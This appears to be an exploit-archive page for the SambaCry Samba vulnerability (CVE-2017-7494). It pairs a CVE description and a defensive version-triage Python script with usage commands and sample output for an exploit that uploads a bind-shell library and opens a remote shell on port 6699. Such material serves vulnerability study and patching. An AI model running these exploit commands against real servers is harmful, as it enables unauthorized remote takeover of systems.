Related vulnerability
Title:
Samba security vulnerability
(CVE-2017-7494)
Description: Samba is a free software suite developed by the Samba Team that lets UNIX-like operating systems interoperate with Microsoft Windows over the SMB/CIFS network protocol; it supports shared printers and file transfer between systems. Samba contains a remote code execution vulnerability: a remote attacker can make the server load and execute an uploaded shared library. Affected versions: Samba before 4.6.4, before 4.5.10, and before 4.4.14.
Description
SambaCry exploit (CVE-2017-7494)
Introduction
# SambaCry RCE exploit for Samba 4.5.9
Samba is a free software re-implementation of the SMB/CIFS networking protocol. Samba provides file and print services for various Microsoft Windows clients and can integrate with a Microsoft Windows Server domain, either as a Domain Controller (DC) or as a domain member. As of version 4, it supports Active Directory and Microsoft Windows NT domains.
Samba version **4.5.9** and earlier is vulnerable to a remote code execution vulnerability named **SambaCry**. CVE-2017-7494 allows remote authenticated users to upload a shared library to a writable shared folder and execute it, taking control of servers that host vulnerable Samba services.
Samba 3.x from 3.5.0 onward, 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 do not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder and execute arbitrary code via a crafted named pipe.
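The affected ranges above are easy to misread when triaging a fleet (4.5.9 is affected, 4.5.10 is not; 3.4.x is not, 3.5.0 is). The following is an added example, not part of the PoC or of Samba itself, that encodes exactly the ranges stated in this README and classifies version strings such as those printed by `smbd -V` or recorded in an inventory. The inventory lines at the bottom are constructed sample input.

```python
"""Classify Samba version strings against the CVE-2017-7494 affected ranges.

Added defender-side example, not part of the original PoC. The ranges are the
ones stated in the README: 3.x from 3.5.0 onward, 4.x before 4.4.14,
4.5.x before 4.5.10 and 4.6.x before 4.6.4 are affected.
"""
import re
from typing import List, Tuple

Version = Tuple[int, int, int]

# First fixed release of each 4.x branch that received a fix.
FIXED_IN_BRANCH = {
    (4, 4): (4, 4, 14),
    (4, 5): (4, 5, 10),
    (4, 6): (4, 6, 4),
}


def parse_version(text: str) -> Version:
    """Extract the first major.minor.patch triple from a string.

    Accepts forms like "Samba 4.5.9", "Version 4.5.9-Debian" or "4.5.9".
    """
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_affected(text: str) -> bool:
    """True if the version falls inside the ranges the README lists."""
    version = parse_version(text)
    major, minor, _ = version
    if major == 3:
        # "3.x after 3.5.0": every 3.x release from 3.5.0 onward.
        return version >= (3, 5, 0)
    if major == 4:
        if minor < 4:
            # "4.x before 4.4.14" covers the whole 4.0 to 4.3 series.
            return True
        fixed = FIXED_IN_BRANCH.get((major, minor))
        if fixed is None:
            # 4.7 and later were released after the fix.
            return False
        return version < fixed
    return False


def affected_hosts(inventory: List[str]) -> List[str]:
    """Return the hostnames (first field) of inventory lines running affected Samba."""
    return [line.split()[0] for line in inventory if is_affected(line)]


# Constructed sample inventory: "<host> <samba version string>".
SAMPLE_INVENTORY = [
    "fileserver01 Samba 4.5.9",
    "nas02 Version 4.6.4",
    "legacy03 Samba 3.6.25-Debian",
    "build04 Samba 4.7.0",
]

if __name__ == "__main__":
    for host in affected_hosts(SAMPLE_INVENTORY):
        print(f"{host}: affected by CVE-2017-7494, patch required")
```

Version comparison is done on integer tuples so that 4.5.9 sorts below 4.5.10 (a plain string comparison would get this wrong). Distribution builds that backport the fix without bumping the upstream version will still be flagged; treat the output as a triage list to confirm against the vendor's changelog, not as a final verdict.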
## Exploit
Set up the Python environment for this exploit by installing the dependencies listed in `requirements.txt`:
```
pip3 install -r requirements.txt
```
After that, run it as follows:
```
./exploit -t <target> -e libbindshell-samba.so \
-s <share> -r <location>/libbindshell-samba.so \
-u <user> -p <password> -P 6699
```
For example, if you use the vulnerable image from `vulnerables/cve-2017-7494` and want to run this exploit against it:
```
./exploit -t <target> -e libbindshell-samba.so \
-s data -r /data/libbindshell-samba.so \
-u sambacry -p nosambanocry -P 6699
```
You will get the following output:
```
./exploit -t <target> -e libbindshell-samba.so \
-s data -r /data/libbindshell-samba.so \
-u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>
```
# Kudos
The payload for this project, along with the code, was heavily inspired by `opsxcq/exploit-CVE-2017-7494`.
File snapshot
[4.0K] /data/pocs/5eee0c98126e6f7f62d2a77780faef9aa7dc2ae3
├── [1.9K] bindshell-samba.c
├── [ 138] bindshell-samba.h
├── [3.9K] exploit.py
├── [2.2K] README.md
└── [ 62] requirements.txt
0 directories, 5 files
Notes
1. Accessing the original source is recommended where possible.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of this PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.